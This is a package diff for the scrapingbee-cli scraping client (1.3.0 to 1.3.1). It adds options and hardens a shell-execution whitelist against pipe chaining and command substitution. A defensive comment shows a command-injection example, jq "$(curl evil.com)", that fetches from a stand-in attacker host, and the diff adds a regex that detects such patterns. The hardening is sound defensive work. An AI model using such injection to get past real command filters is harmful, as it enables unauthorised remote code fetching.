scrapingbee-cli 1.3.0__tar.gz → 1.3.1__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (35) hide show
  1. {scrapingbee_cli-1.3.0/src/scrapingbee_cli.egg-info → scrapingbee_cli-1.3.1}/PKG-INFO +5 -2
  2. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/README.md +4 -1
  3. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/pyproject.toml +1 -1
  4. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/__init__.py +1 -1
  5. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli_utils.py +19 -0
  6. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/client.py +8 -0
  7. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/amazon.py +2 -1
  8. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/crawl.py +10 -0
  9. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/google.py +2 -1
  10. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/scrape.py +8 -0
  11. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/walmart.py +19 -3
  12. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/youtube.py +9 -4
  13. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/exec_gate.py +50 -5
  14. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1/src/scrapingbee_cli.egg-info}/PKG-INFO +5 -2
  15. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/LICENSE +0 -0
  16. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/setup.cfg +0 -0
  17. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/audit.py +0 -0
  18. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/batch.py +0 -0
  19. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli.py +0 -0
  20. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/__init__.py +0 -0
  21. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/auth.py +0 -0
  22. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/chatgpt.py +0 -0
  23. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/export.py +0 -0
  24. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/fast_search.py +0 -0
  25. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/schedule.py +0 -0
  26. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/unsafe.py +0 -0
  27. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/usage.py +0 -0
  28. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/config.py +0 -0
  29. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/crawl.py +0 -0
  30. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/credits.py +0 -0
  31. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/SOURCES.txt +0 -0
  32. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/dependency_links.txt +0 -0
  33. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/entry_points.txt +0 -0
  34. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/requires.txt +0 -0
  35. {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: scrapingbee-cli
3
- Version: 1.3.0
3
+ Version: 1.3.1
4
4
  Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
5
5
  Author: ScrapingBee
6
6
  License-Expression: MIT
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
81
81
  - **`scrapingbee --help`** – List all commands.
82
82
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
83
83
 
84
- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
84
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
85
+
86
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
85
87
 
86
88
  ### Commands
87
89
 
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
117
119
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
118
120
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
119
121
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
122
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
120
123
 
121
124
  ### Examples
122
125
 
@@ -44,7 +44,9 @@ scrapingbee [command] [arguments] [options]
44
44
  - **`scrapingbee --help`** – List all commands.
45
45
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
46
46
 
47
- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
47
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
48
+
49
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
48
50
 
49
51
  ### Commands
50
52
 
@@ -80,6 +82,7 @@ scrapingbee [command] [arguments] [options]
80
82
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
81
83
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
82
84
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
85
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
83
86
 
84
87
  ### Examples
85
88
 
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "scrapingbee-cli"
7
- version = "1.3.0"
7
+ version = "1.3.1"
8
8
  description = "Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal."
9
9
  readme = "README.md"
10
10
  license = "MIT"
@@ -3,7 +3,7 @@
3
3
  import platform
4
4
  import sys
5
5
 
6
- __version__ = "1.3.0"
6
+ __version__ = "1.3.1"
7
7
 
8
8
 
9
9
  def user_agent() -> str:
@@ -9,6 +9,23 @@ from typing import Any
9
9
  import click
10
10
 
11
11
 
12
+ class NormalizedChoice(click.Choice):
13
+ """Choice type that accepts both hyphens and underscores.
14
+
15
+ Automatically converts underscores to hyphens before validation,
16
+ allowing users to use either format interchangeably.
17
+ Example: both --sort-by price-low and --sort-by price_low work.
18
+ """
19
+
20
+ def convert(self, value: str, param: Any, ctx: Any) -> str:
21
+ """Convert underscores to hyphens before validation."""
22
+ if value is not None:
23
+ normalized = value.replace("_", "-")
24
+ else:
25
+ normalized = value
26
+ return super().convert(normalized, param, ctx)
27
+
28
+
12
29
  def _output_options(f: Any) -> Any:
13
30
  """Output + Retry options (for commands without batch support)."""
14
31
  f = click.option(
@@ -385,6 +402,7 @@ def build_scrape_kwargs(
385
402
  custom_google: str | None = None,
386
403
  transparent_status_code: str | None = None,
387
404
  body: str | None = None,
405
+ scraping_config: str | None = None,
388
406
  ) -> dict[str, Any]:
389
407
  """Build kwargs for Client.scrape() from scrape command options.
390
408
  Single source of parse_bool for bool-like opts."""
@@ -424,6 +442,7 @@ def build_scrape_kwargs(
424
442
  "custom_google": parse_bool(custom_google),
425
443
  "transparent_status_code": parse_bool(transparent_status_code),
426
444
  "body": body,
445
+ "scraping_config": scraping_config,
427
446
  }
428
447
 
429
448
 
@@ -177,6 +177,7 @@ class Client:
177
177
  custom_google: bool | None = None,
178
178
  transparent_status_code: bool | None = None,
179
179
  body: str | None = None,
180
+ scraping_config: str | None = None,
180
181
  retries: int = 3,
181
182
  backoff: float = 2.0,
182
183
  **kwargs: Any,
@@ -217,6 +218,7 @@ class Client:
217
218
  ("device", device),
218
219
  ("custom_google", self._bool(custom_google)),
219
220
  ("transparent_status_code", self._bool(transparent_status_code)),
221
+ ("scraping_config", scraping_config),
220
222
  ]:
221
223
  if v is not None:
222
224
  params[k] = str(v) if not isinstance(v, str) else v
@@ -415,6 +417,7 @@ class Client:
415
417
  async def walmart_search(
416
418
  self,
417
419
  query: str,
420
+ start_page: int | None = None,
418
421
  min_price: int | None = None,
419
422
  max_price: int | None = None,
420
423
  sort_by: str | None = None,
@@ -432,6 +435,7 @@ class Client:
432
435
  ) -> tuple[bytes, dict, int]:
433
436
  params = {
434
437
  "query": query,
438
+ "start_page": start_page if start_page is not None else None,
435
439
  "min_price": min_price if min_price is not None else None,
436
440
  "max_price": max_price if max_price is not None else None,
437
441
  "sort_by": sort_by,
@@ -455,6 +459,7 @@ class Client:
455
459
  async def walmart_product(
456
460
  self,
457
461
  product_id: str,
462
+ device: str | None = None,
458
463
  domain: str | None = None,
459
464
  delivery_zip: str | None = None,
460
465
  store_id: str | None = None,
@@ -466,6 +471,7 @@ class Client:
466
471
  ) -> tuple[bytes, dict, int]:
467
472
  params = {
468
473
  "product_id": product_id,
474
+ "device": device,
469
475
  "domain": domain,
470
476
  "delivery_zip": delivery_zip,
471
477
  "store_id": store_id,
@@ -497,6 +503,7 @@ class Client:
497
503
  hdr: bool | None = None,
498
504
  location: bool | None = None,
499
505
  vr180: bool | None = None,
506
+ purchased: bool | None = None,
500
507
  retries: int = 3,
501
508
  backoff: float = 2.0,
502
509
  ) -> tuple[bytes, dict, int]:
@@ -516,6 +523,7 @@ class Client:
516
523
  "hdr": self._bool(hdr),
517
524
  "location": self._bool(location),
518
525
  "vr180": self._bool(vr180),
526
+ "purchased": self._bool(purchased),
519
527
  }
520
528
  return await self._get_with_retry(
521
529
  "/youtube/search",
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE_TABLET,
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  _validate_page,
22
23
  check_api_response,
@@ -191,7 +192,7 @@ def amazon_product_cmd(
191
192
  @optgroup.option("--pages", type=int, default=None, help="Number of pages to fetch.")
192
193
  @optgroup.option(
193
194
  "--sort-by",
194
- type=click.Choice(AMAZON_SORT_BY, case_sensitive=False),
195
+ type=NormalizedChoice(AMAZON_SORT_BY, case_sensitive=False),
195
196
  default=None,
196
197
  help="Sort order.",
197
198
  )
@@ -59,6 +59,7 @@ def _crawl_build_params(
59
59
  device: str | None,
60
60
  custom_google: str | None,
61
61
  transparent_status_code: str | None,
62
+ scraping_config: str | None = None,
62
63
  ) -> dict[str, str]:
63
64
  """Build ScrapingBee API params dict from crawl options (quick-crawl URL mode)."""
64
65
  kwargs = build_scrape_kwargs(
@@ -97,6 +98,7 @@ def _crawl_build_params(
97
98
  custom_google=custom_google,
98
99
  transparent_status_code=transparent_status_code,
99
100
  body=None,
101
+ scraping_config=scraping_config,
100
102
  )
101
103
  return scrape_kwargs_to_api_params(kwargs)
102
104
 
@@ -117,6 +119,12 @@ def _crawl_build_params(
117
119
  default=None,
118
120
  help="Path to Scrapy project. Spider mode only.",
119
121
  )
122
+ @click.option(
123
+ "--scraping-config",
124
+ type=str,
125
+ default=None,
126
+ help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
127
+ )
120
128
  @optgroup.group("Rendering", help="JavaScript rendering and viewport options")
121
129
  @optgroup.option(
122
130
  "--render-js",
@@ -323,6 +331,7 @@ def crawl_cmd(
323
331
  target: tuple[str, ...],
324
332
  from_sitemap: str | None,
325
333
  project: str | None,
334
+ scraping_config: str | None,
326
335
  render_js: str | None,
327
336
  js_scenario: str | None,
328
337
  wait: int | None,
@@ -467,6 +476,7 @@ def crawl_cmd(
467
476
  device=device,
468
477
  custom_google=custom_google,
469
478
  transparent_status_code=transparent_status_code,
479
+ scraping_config=scraping_config,
470
480
  )
471
481
  except ValueError as e:
472
482
  click.echo(str(e), err=True)
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE,
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  _validate_page,
22
23
  check_api_response,
@@ -56,7 +57,7 @@ def _warn_empty_organic(data: bytes, search_type: str | None) -> None:
56
57
  @optgroup.group("Search", help="Search type, locale, and pagination")
57
58
  @optgroup.option(
58
59
  "--search-type",
59
- type=click.Choice(
60
+ type=NormalizedChoice(
60
61
  ["classic", "news", "maps", "lens", "shopping", "images", "ai-mode"],
61
62
  case_sensitive=False,
62
63
  ),
@@ -84,6 +84,12 @@ SCRAPE_PRESETS = (
84
84
  default=None,
85
85
  help="Apply a predefined set of options. Preset only sets options you did not set. See --help for list.",
86
86
  )
87
+ @click.option(
88
+ "--scraping-config",
89
+ type=str,
90
+ default=None,
91
+ help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
92
+ )
87
93
  @click.option(
88
94
  "--force-extension",
89
95
  type=str,
@@ -308,6 +314,7 @@ def scrape_cmd(
308
314
  obj: dict,
309
315
  url: str | None,
310
316
  preset: str | None,
317
+ scraping_config: str | None,
311
318
  force_extension: str | None,
312
319
  render_js: str | None,
313
320
  js_scenario: str | None,
@@ -467,6 +474,7 @@ def scrape_cmd(
467
474
  custom_google=custom_google,
468
475
  transparent_status_code=transparent_status_code,
469
476
  body=body,
477
+ scraping_config=scraping_config,
470
478
  )
471
479
  except ValueError as e:
472
480
  click.echo(str(e), err=True)
@@ -17,7 +17,9 @@ from ..batch import (
17
17
  )
18
18
  from ..cli_utils import (
19
19
  DEVICE_DESKTOP_MOBILE_TABLET,
20
+ NormalizedChoice,
20
21
  _batch_options,
22
+ _validate_page,
21
23
  _validate_price_range,
22
24
  check_api_response,
23
25
  norm_val,
@@ -34,12 +36,13 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
34
36
 
35
37
  @click.command("walmart-search")
36
38
  @click.argument("query", required=False)
37
- @optgroup.group("Filters", help="Price and sort")
39
+ @optgroup.group("Pagination & filters", help="Pages, price, and sort")
40
+ @optgroup.option("--start-page", type=int, default=None, help="Starting page number.")
38
41
  @optgroup.option("--min-price", type=int, default=None, help="Minimum price filter (integer).")
39
42
  @optgroup.option("--max-price", type=int, default=None, help="Maximum price filter (integer).")
40
43
  @optgroup.option(
41
44
  "--sort-by",
42
- type=click.Choice(WALMART_SORT_BY, case_sensitive=False),
45
+ type=NormalizedChoice(WALMART_SORT_BY, case_sensitive=False),
43
46
  default=None,
44
47
  help="Sort order.",
45
48
  )
@@ -74,6 +77,7 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
74
77
  def walmart_search_cmd(
75
78
  obj: dict,
76
79
  query: str | None,
80
+ start_page: int | None,
77
81
  min_price: int | None,
78
82
  max_price: int | None,
79
83
  sort_by: str | None,
@@ -96,6 +100,7 @@ def walmart_search_cmd(
96
100
  except ValueError as e:
97
101
  click.echo(str(e), err=True)
98
102
  raise SystemExit(1)
103
+ _validate_page(start_page, "start_page")
99
104
  _validate_price_range(min_price, max_price)
100
105
 
101
106
  if input_file:
@@ -123,6 +128,7 @@ def walmart_search_cmd(
123
128
  async def api_call(client, q):
124
129
  return await client.walmart_search(
125
130
  q,
131
+ start_page=start_page,
126
132
  min_price=min_price,
127
133
  max_price=max_price,
128
134
  sort_by=norm_val(sort_by),
@@ -165,6 +171,7 @@ def walmart_search_cmd(
165
171
  async with Client(key, BASE_URL) as client:
166
172
  data, headers, status_code = await client.walmart_search(
167
173
  query,
174
+ start_page=start_page,
168
175
  min_price=min_price,
169
176
  max_price=max_price,
170
177
  sort_by=norm_val(sort_by),
@@ -200,7 +207,13 @@ def walmart_search_cmd(
200
207
 
201
208
  @click.command("walmart-product")
202
209
  @click.argument("product_id", required=False)
203
- @optgroup.group("Locale", help="Domain and delivery location")
210
+ @optgroup.group("Device & locale", help="Device, domain, and delivery location")
211
+ @optgroup.option(
212
+ "--device",
213
+ type=click.Choice(DEVICE_DESKTOP_MOBILE_TABLET, case_sensitive=False),
214
+ default=None,
215
+ help="Device: desktop, mobile, or tablet.",
216
+ )
204
217
  @optgroup.option("--domain", type=str, default=None, help="Walmart domain.")
205
218
  @optgroup.option("--delivery-zip", type=str, default=None, help="Delivery ZIP code.")
206
219
  @optgroup.option("--store-id", type=str, default=None, help="Walmart store ID.")
@@ -213,6 +226,7 @@ def walmart_search_cmd(
213
226
  def walmart_product_cmd(
214
227
  obj: dict,
215
228
  product_id: str | None,
229
+ device: str | None,
216
230
  domain: str | None,
217
231
  delivery_zip: str | None,
218
232
  store_id: str | None,
@@ -255,6 +269,7 @@ def walmart_product_cmd(
255
269
  async def api_call(client, pid):
256
270
  return await client.walmart_product(
257
271
  pid,
272
+ device=device,
258
273
  domain=domain,
259
274
  delivery_zip=delivery_zip,
260
275
  store_id=store_id,
@@ -291,6 +306,7 @@ def walmart_product_cmd(
291
306
  async with Client(key, BASE_URL) as client:
292
307
  data, headers, status_code = await client.walmart_product(
293
308
  product_id,
309
+ device=device,
294
310
  domain=domain,
295
311
  delivery_zip=delivery_zip,
296
312
  store_id=store_id,
@@ -17,6 +17,7 @@ from ..batch import (
17
17
  validate_batch_run,
18
18
  )
19
19
  from ..cli_utils import (
20
+ NormalizedChoice,
20
21
  _batch_options,
21
22
  check_api_response,
22
23
  norm_val,
@@ -117,26 +118,26 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
117
118
  @optgroup.group("Filters", help="Upload date, type, duration, sort")
118
119
  @optgroup.option(
119
120
  "--upload-date",
120
- type=click.Choice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
121
+ type=NormalizedChoice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
121
122
  default=None,
122
123
  help="Filter by upload date.",
123
124
  )
124
125
  @optgroup.option(
125
126
  "--type",
126
127
  "type_",
127
- type=click.Choice(YOUTUBE_TYPE, case_sensitive=False),
128
+ type=NormalizedChoice(YOUTUBE_TYPE, case_sensitive=False),
128
129
  default=None,
129
130
  help="Result type.",
130
131
  )
131
132
  @optgroup.option(
132
133
  "--duration",
133
- type=click.Choice(YOUTUBE_DURATION, case_sensitive=False),
134
+ type=NormalizedChoice(YOUTUBE_DURATION, case_sensitive=False),
134
135
  default=None,
135
136
  help="Duration: short (<4 min), medium (4-20 min), long (>20 min).",
136
137
  )
137
138
  @optgroup.option(
138
139
  "--sort-by",
139
- type=click.Choice(YOUTUBE_SORT_BY, case_sensitive=False),
140
+ type=NormalizedChoice(YOUTUBE_SORT_BY, case_sensitive=False),
140
141
  default=None,
141
142
  help="Sort order.",
142
143
  )
@@ -153,6 +154,7 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
153
154
  @optgroup.option("--hdr", type=str, default=None, help="HDR videos only (true/false).")
154
155
  @optgroup.option("--location", type=str, default=None, help="With location (true/false).")
155
156
  @optgroup.option("--vr180", type=str, default=None, help="VR180 only (true/false).")
157
+ @optgroup.option("--purchased", type=str, default=None, help="Purchased only (true/false).")
156
158
  @_batch_options
157
159
  @click.pass_obj
158
160
  def youtube_search_cmd(
@@ -172,6 +174,7 @@ def youtube_search_cmd(
172
174
  hdr: str | None,
173
175
  location: str | None,
174
176
  vr180: str | None,
177
+ purchased: str | None,
175
178
  **kwargs,
176
179
  ) -> None:
177
180
  """Search YouTube videos."""
@@ -223,6 +226,7 @@ def youtube_search_cmd(
223
226
  hdr=parse_bool(hdr),
224
227
  location=parse_bool(location),
225
228
  vr180=parse_bool(vr180),
229
+ purchased=parse_bool(purchased),
226
230
  retries=obj.get("retries", 3) or 3,
227
231
  backoff=obj.get("backoff", 2.0) or 2.0,
228
232
  )
@@ -268,6 +272,7 @@ def youtube_search_cmd(
268
272
  hdr=parse_bool(hdr),
269
273
  location=parse_bool(location),
270
274
  vr180=parse_bool(vr180),
275
+ purchased=parse_bool(purchased),
271
276
  retries=obj.get("retries", 3) or 3,
272
277
  backoff=obj.get("backoff", 2.0) or 2.0,
273
278
  )
@@ -10,6 +10,7 @@ All three features are disabled by default. To enable, ALL of these must be true
10
10
  from __future__ import annotations
11
11
 
12
12
  import os
13
+ import re
13
14
 
14
15
  import click
15
16
 
@@ -59,20 +60,64 @@ def get_whitelist() -> list[str]:
59
60
  return [cmd.strip() for cmd in raw.split(",") if cmd.strip()]
60
61
 
61
62
 
62
- def is_command_whitelisted(cmd: str) -> bool:
63
- """Check if a command matches the whitelist (starts with an allowed prefix)."""
64
- cmd_stripped = cmd.strip()
63
+ # Patterns that bypass whitelist validation by executing commands
64
+ # inside what looks like a single whitelisted command.
65
+ # Example: jq "$(curl evil.com)" — one segment starting with "jq",
66
+ # but $() executes curl before jq even runs.
67
+ _SUBSTITUTION_PATTERNS = re.compile(
68
+ r"\$\(" # command substitution $(...)
69
+ r"|`" # backtick command substitution
70
+ r"|\$\{" # variable expansion ${...} (can embed commands)
71
+ r"|<\(" # process substitution <(...)
72
+ r"|>\(" # process substitution >(...)
73
+ )
74
+
75
+
76
+ def _split_shell_segments(cmd: str) -> list[str]:
77
+ """Split a shell command on pipe and chaining operators.
78
+
79
+ Returns the individual command segments from a chain like:
80
+ 'jq .title | head -1 && echo done' → ['jq .title', 'head -1', 'echo done']
81
+ """
82
+ # Split on ||, &&, |, ;, &, and newlines — longest operators first
83
+ parts = re.split(r"\|\||&&|[|;&\n]", cmd)
84
+ return [p.strip() for p in parts if p.strip()]
85
+
86
+
87
+ def _is_single_segment_whitelisted(segment: str) -> bool:
88
+ """Check if a single command segment matches the whitelist."""
65
89
  for allowed in get_whitelist():
66
- if cmd_stripped.startswith(allowed):
90
+ if segment.startswith(allowed):
67
91
  return True
68
92
  return False
69
93
 
70
94
 
95
+ def is_command_whitelisted(cmd: str) -> bool:
96
+ """Check if a command is safe to execute against the whitelist.
97
+
98
+ Validates ALL segments in a piped/chained command, not just the first.
99
+ Also blocks command/process substitution which can bypass segment validation.
100
+ """
101
+ cmd_stripped = cmd.strip()
102
+
103
+ # Block substitution patterns that bypass whitelist validation
104
+ if _SUBSTITUTION_PATTERNS.search(cmd_stripped):
105
+ return False
106
+
107
+ # Validate every segment in the command chain
108
+ segments = _split_shell_segments(cmd_stripped)
109
+ if not segments:
110
+ return False
111
+ return all(_is_single_segment_whitelisted(seg) for seg in segments)
112
+
113
+
71
114
  def require_exec(feature_name: str, cmd: str | None = None) -> None:
72
115
  """Gate check — call before any shell execution.
73
116
 
74
117
  Required: SCRAPINGBEE_ALLOW_EXEC=1 + SCRAPINGBEE_UNSAFE_VERIFIED=1
75
118
  Optional: SCRAPINGBEE_ALLOWED_COMMANDS — if set, command must match whitelist.
119
+ Blocks shell injection patterns (pipes to non-whitelisted commands,
120
+ command substitution, backticks, process substitution).
76
121
  """
77
122
  if not is_exec_enabled():
78
123
  click.echo(_VAGUE_ERROR, err=True)
@@ -81,7 +126,7 @@ def require_exec(feature_name: str, cmd: str | None = None) -> None:
81
126
  # Whitelist is optional — if set, enforce it
82
127
  if cmd is not None and is_whitelist_enabled() and not is_command_whitelisted(cmd):
83
128
  click.echo(
84
- f"Command not in whitelist: {cmd.split()[0] if cmd.split() else cmd}",
129
+ "Command blocked: contains non-whitelisted command or shell injection pattern.",
85
130
  err=True,
86
131
  )
87
132
  raise SystemExit(1)
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: scrapingbee-cli
3
- Version: 1.3.0
3
+ Version: 1.3.1
4
4
  Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
5
5
  Author: ScrapingBee
6
6
  License-Expression: MIT
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
81
81
  - **`scrapingbee --help`** – List all commands.
82
82
  - **`scrapingbee [command] --help`** – Options and parameters for that command.
83
83
 
84
- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
84
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
85
+
86
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
85
87
 
86
88
  ### Commands
87
89
 
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
117
119
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
118
120
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
119
121
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
122
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
120
123
 
121
124
  ### Examples
122
125
 
File without changes